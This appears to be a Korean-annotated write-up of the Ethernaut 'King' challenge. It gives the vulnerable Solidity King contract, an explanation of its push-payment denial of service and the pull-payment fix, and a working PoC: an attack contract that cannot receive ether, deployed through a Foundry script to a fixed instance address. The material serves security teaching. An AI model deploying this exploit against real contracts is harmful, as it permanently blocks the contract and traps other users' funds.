킹..

Prob

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

/// @title King
/// @notice Throne game: an address that sends at least the current prize becomes
///         king, and the ether it sent is forwarded to the previous king.
/// @dev The forwarding in receive() is a push payment whose failure reverts the
///      whole claim; see the comments there for the denial-of-service consequence.
contract King {
    // Current king. No visibility keyword is given; callers read it through _king().
    address king;
    // Value of the most recently accepted claim; the minimum a non-owner must send.
    uint256 public prize;
    // Deployer of the contract; exempt from the minimum-value check in receive().
    address public owner;

    /// @notice The deployer becomes both owner and first king, and the ether
    ///         attached to the deployment becomes the initial prize.
    constructor() payable {
        owner = msg.sender;
        king = msg.sender;
        prize = msg.value;
    }

    /// @notice Handles a plain ether transfer as a claim on the throne.
    /// @dev Reverts (with no reason string) when a non-owner sends less than prize,
    ///      and also whenever the payout to the current king fails.
    receive() external payable {
        // Accept the claim if it meets the prize, or unconditionally for the owner.
        require(msg.value >= prize || msg.sender == owner);
        // Push payment to the outgoing king. transfer() reverts if the recipient
        // cannot accept ether (for example a contract with no payable
        // receive/fallback), and that revert undoes this entire call. A king that
        // rejects ether therefore blocks every later claim, the owner's included.
        // Mitigation: record the amount owed and let the previous king withdraw it
        // in a separate call (pull payment), so that the state update below never
        // depends on the recipient's behaviour.
        payable(king).transfer(msg.value);
        // Only reached when the payout above succeeded.
        king = msg.sender;
        prize = msg.value;
    }

    /// @notice Returns the address of the current king.
    function _king() public view returns (address) {
        return king;
    }
}

PoC

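attack 컨트랙트에는 receive/fallback 함수가 없어 이더를 받을 수 없습니다. 따라서 King이 이전 king(attack 컨트랙트)에게 보내는 transfer 호출이 revert되고 receive() 전체가 실패하므로, attack 컨트랙트가 king 자리를 계속 유지하게 됩니다. 근본 원인은 King이 외부 주소로의 송금 성공을 상태 변경의 전제 조건으로 둔 것이며, 이전 king이 직접 출금하는 pull 방식으로 바꾸면 방지할 수 있습니다.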

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import {Script, console} from "forge-std/Script.sol";

/// @notice Minimal view of the King contract: only the getter for the current prize.
/// @dev Declared here but not referenced by the attack or exploit contracts below.
interface IKing {
    /// @return The value a non-owner must match or exceed to become king.
    function prize() external view returns (uint256);
}

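/// @notice Helper for the King level: forwards its deployment value to the target
///         so that this contract's own address becomes king.
/// @dev The contract declares no receive() or fallback(), so it cannot accept
///      ether after deployment. King's payout to it via transfer() will therefore
///      revert, which is the behaviour the level is meant to demonstrate.
contract attack {
    /// @param target King instance that receives the deployment value.
    constructor(address payable target) payable {
        // call{value:...} forwards all remaining gas, so King's receive() has
        // enough to pay out the previous king and update its state.
        (bool sent, ) = target.call{value: msg.value}("");
        // The original ignored the return value. A rejected claim (value below
        // the prize) would then deploy successfully and leave the ether stuck
        // here, because this contract has no way to send it back out.
        require(sent, "King rejected the deposit");
    }
}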

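/// @notice Foundry script that deploys the attack helper against a King instance.
contract exploit is Script {
    /// @notice Broadcasts one transaction: deployment of `attack` with the claim value attached.
    function run() public {
        // The original declared `uint256 pk = pk;` and then passed an undeclared
        // `privateKey` to startBroadcast, so it did not compile. The signing key is
        // now read from the environment and never written into the source file.
        // "PRIVATE_KEY" is a placeholder variable name; use whatever your setup exports.
        uint256 privateKey = vm.envUint("PRIVATE_KEY");

        // Level instance address as given on the page.
        address addr = 0x612fE2418bB97C220Cc8F63Cc95E3261d4664CD9;

        vm.startBroadcast(privateKey);

        // Must be at least the instance's current prize or King reverts the claim.
        // NOTE(review): 0.0010001 ether is presumably just above this instance's
        // prize - confirm against prize() before broadcasting.
        new attack{value: 0.0010001 ether}(payable(addr));

        vm.stopBroadcast();
    }
}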
